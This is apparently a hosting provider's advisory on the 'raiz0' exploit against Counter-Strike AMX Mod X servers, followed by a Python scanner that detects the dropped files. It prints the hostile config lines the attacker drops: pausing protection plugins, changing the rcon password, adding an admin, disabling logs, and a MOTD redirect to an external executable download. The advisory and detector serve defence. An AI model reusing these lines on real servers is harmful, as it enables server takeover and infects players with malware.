[Fixed] raiz0 exploit

A new type of exploit has appeared. It creates files with the .cfg extension and writes various lines into them. These lines overwrite certain server settings: for example, they change your rcon password and disable the plugins that prevent a number of other exploits. To do this it uses the writefile module, for example:

COM_WriteFile : addons/amxmodx/configs/maps/de_nuke_rarea.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\de_nuke_rarea.cfg

Update: The attacker has also made a video available to us, showing how the servers could be exploited.

https://youtube.com/devicesupport

The attacker connects to the server with:
….connect 48 1899560584 "\prot\3\unique\-1\raw\steam\cdkey\85f1731996f9844694d90d4aa89ad373" "\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\0\cl_lc\1\cl_lw\1\cl_updaterate\20\model\arctic\name\Alex\team\topcolor\topcolor\30\_dr\raiz0\_laleagane\raiz0\_anzo\raiz0\_hns\raiz0\translit\1\_pw\test\_gm\0630\lang\pl\autobind\v1.0\rate\20000"

and then creates the following files:

cs/cstrike/addons/amxmodx/configs/maps/de_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby6.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_c00l_f.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_long.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_tuscan.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_vertigo.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_havana.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_perfect_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_zima.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_amr.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul32.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dinaunion.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_arctic.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_eldorado.cfg
cs/cstrike/addons/amxmodx/configs/maps/as_oilrig.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty.cfgl
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs2.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lapp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_romania.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_alexandra.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_epixi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cbble.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_mie.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty2k_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4ever.cfg
cs/cstrike/addons/amxmodx/configs/maps/codex_knife.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno2se.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_india.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_choklad.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_abaddon.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_kolor_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp_alone.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_helvis.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_siege.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_dixor.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustyaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow2k.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_bycastor32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_zigzag.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_purplez.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_backalley.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2006.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_prodigy.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_unreal.cfg
cs/cstrike/addons/amxmodx/configs/maps/css_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cpl_mill_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood_big.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustvsaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_ghosts.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainrun.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke.cfg
cs/cstrike/addons/amxmodx/configs/maps/hnsm_nemesis.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_chateau.cfg
cs/cstrike/addons/amxmodx/configs/maps/31hp_knife_pro.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_airstrip.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_militia.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_piranesi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_industro.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooftops.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_estate.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b1.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault_hotel.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke_rarea.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lime.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby3.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_3h.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooft0ps_remake.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_love.cfg
cs/cstrike/addons/metamod/exec.cfg

These files contain settings such as:

amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
rcon_password 198709871234l0l
rcon hostname www.raiz0.org
hostname www.raiz0.org
motdfile motd.txt
motd_write <meta http-equiv="Refresh" content="0; url=https://dl.dropboxusercontent.com/u/57066153/java/explorer.exe">
amx_addadmin "STEAM_0:0:718437961" "abcdefghijklmnopqrstu"
log off
mp_logfile 0

In this way the attacker changes your rcon password, gains administrator access and can manipulate your server.

rcon 1899560584 "198709871234l0l" say Server hacked by raiz0@yahoo.com.

We do not know exactly by what methods the attacker manages to create those files, but in the control panel, under Manage Addons, we have released a plugin that can secure your server. Its name is: Securizare exploit: raiz0. Once installed, it secures your server's files. If, for example, you want to modify certain files over FTP, such as user.ini, you will not be allowed to. To do so anyway, you can disable the plugin, make your changes and re-enable it, until we find a better method of preventing this type of exploit.
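A defender-side check for the dropped files described above, as an added example (it is not the hosting provider's plugin and not code from the original post): it walks a server directory and flags .cfg lines that match the directive families quoted on this page. The rule names, the `server.cfg` allowlist for `rcon_password` and the sample tree built in `demo()` are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# Directive families taken from the dropped files quoted on this page.
RULES = {
    "plugin_paused": re.compile(r"^amxx\s+pause\b", re.I),
    "rcon_password": re.compile(r"^rcon_password\b", re.I),
    "admin_added": re.compile(r"^amx_addadmin\b", re.I),
    "motd_redirect": re.compile(r"^motd_write\b.*http-equiv", re.I),
    "logging_off": re.compile(r"^(log\s+off|mp_logfile\s+0)\s*$", re.I),
}
RCON_ALLOWED = {"server.cfg"}  # assumption: only file that may set rcon_password

def scan_cfg_text(text, filename=""):
    """Return [(line_no, rule_name, line)] for suspicious directives."""
    hits = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("//"):  # cfg comment
            continue
        for name, rx in RULES.items():
            expected = name == "rcon_password" and filename in RCON_ALLOWED
            if not expected and rx.search(line):
                hits.append((no, name, line))
                break
    return hits

def scan_tree(root):
    """Scan every .cfg under root; return {relative_path: hits}."""
    report = {}
    for path in sorted(Path(root).rglob("*.cfg")):
        hits = scan_cfg_text(path.read_text(errors="replace"), path.name)
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Scan a constructed tree: clean server.cfg, clean map cfg, dropped cfg."""
    dropped = ('amxx pause some_guard.amxx\nrcon_password CHANGED\nlog off\n'
               'motd_write <meta http-equiv="Refresh" content="0; url=https://example.invalid/">\n'
               'amx_addadmin "STEAM_0:0:1" "abc"\nmp_logfile 0\n')
    with tempfile.TemporaryDirectory() as tmp:
        maps = Path(tmp) / "addons/amxmodx/configs/maps"
        maps.mkdir(parents=True)
        (Path(tmp) / "server.cfg").write_text("hostname demo\nrcon_password legit\n")
        (maps / "de_dust2.cfg").write_text("// per-map settings\nmp_timelimit 30\n")
        (maps / "de_nuke.cfg").write_text(dropped)
        return scan_tree(tmp)
```

Point `scan_tree()` at the server's game directory; a file that hits several rule families at once matches the pattern of the dropped configs shown above.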
